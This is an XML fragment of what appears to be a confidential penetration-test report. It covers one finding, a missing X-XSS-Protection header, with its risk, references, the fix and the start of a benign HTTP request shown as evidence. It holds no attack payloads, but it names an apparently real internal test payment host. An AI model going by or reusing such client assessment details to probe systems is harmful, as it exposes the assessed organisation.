                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="22D6FA7A" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0145E548"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7179BBE4" w14:textId="77777777" w:rsidR="00FD79FD" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The application does not fully utilize browser security controls to block suspected Reflected Cross Site Scripting (Reflected XSS) attacks. The tester observed that the application server's HTTP responses did not contain the X-XSS-Protection Header.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="662A17A2" w14:textId="77777777" w:rsidR="00FD79FD" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Risk:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D98654" w14:textId="77777777" w:rsidR="00FD79FD" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-site scripting (XSS) is a security exploit which allows an attacker to inject into a website malicious client-side code. This code is executed by the victims and lets the attackers bypass access controls and impersonate users. According to the Open Web Application Security Project (OWASP), XSS was the seventh most common Web app vulnerability in 2017. In the event an attacker can find a Cross Site Scripting vulnerability, Internet Explorer will, by default, attempt to rewrite the response in order to prevent the attack.  In the past, research has revealed techniques to bypass the effectiveness of this control. However, this control represents an opportunity to improve the risk posture of the application.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F03349B" w14:textId="77777777" w:rsidR="00FD79FD" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">References: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69061452" w14:textId="320A4520" w:rsidR="00FD79FD" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. MSDN: The XSS Filter  (</w:t>
            </w:r>
            <w:hyperlink r:id="rId29" w:history="1">
              <w:r w:rsidR="002B7238" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://blogs.msdn.microsoft.com/ie/2008/07/02/ie8-security-part-iv-the-xss-filter/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29466AED" w14:textId="1B0ADDED" w:rsidR="00FD79FD" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. OWASP Secure Headers Project (</w:t>
            </w:r>
            <w:hyperlink r:id="rId30" w:anchor="tab=Headers" w:history="1">
              <w:r w:rsidR="002B7238" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#tab=Headers</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D80D779" w14:textId="7C8ACC46" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="002B7238">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3. Mozilla Developer Network Web Docs: X-XSS-Protection (</w:t>
            </w:r>
            <w:hyperlink r:id="rId31" w:history="1">
              <w:r w:rsidR="002B7238" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="321BFDC4" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C53D2AB"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lastRenderedPageBreak/>
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C5B460" w14:textId="77777777" w:rsidR="00FD79FD" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instead of allowing Internet Explorer to rewrite application responses, configure the XSS filter to block suspected XSS attacks. The HTTP 'X-XSS-Protection' response header is a feature of Internet Explorer, Chrome and Safari that stops pages from loading when they detect reflected cross-site scripting (XSS) attacks. Although these protections are largely unnecessary in modern browsers when sites implement a strong Content-Security-Policy that disables the use of inline JavaScript ('unsafe-inline'), they can still provide protections for users of older web browsers that don't yet support CSP. Configure the application to issue the following HTTP response header in all application responses:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09A5A0F1" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>X-XSS-Protection: 1; mode=block</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="5278AB48" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="76E3153A"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Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="00B247C9" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="60F0E12C" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4FCB03" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="00DB64A3" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below HTTP request and response </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>demonstrates</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> that the application is not setting the X-XSS-Protection h</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eader</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="622C1FEF" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w14:paraId="15178A1C" w14:textId="77777777" w:rsidTr="00DB64A3">
              <w:trPr>
                <w:trHeight w:val="1915"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="51D1F8C0" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>GET /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>sgofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/index.html</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7F40D149" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="74A9E12A" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="34300E02" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept: text/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>html,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xhtml+xml,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xml;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.9,*/*;q=0.8</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="32961F0C" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Language: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>en-US,en;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.5</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4431CB4D" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Encoding: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>gzip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>, deflate</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="45512ECD" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/gofundhip/</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="567D428B" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Cookie: </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1E6EA0B2" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="431A058D" w14:textId="77777777" w:rsidR="00DB64A3" w:rsidRPr="00DB64A3" w:rsidRDefault="00DB64A3" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
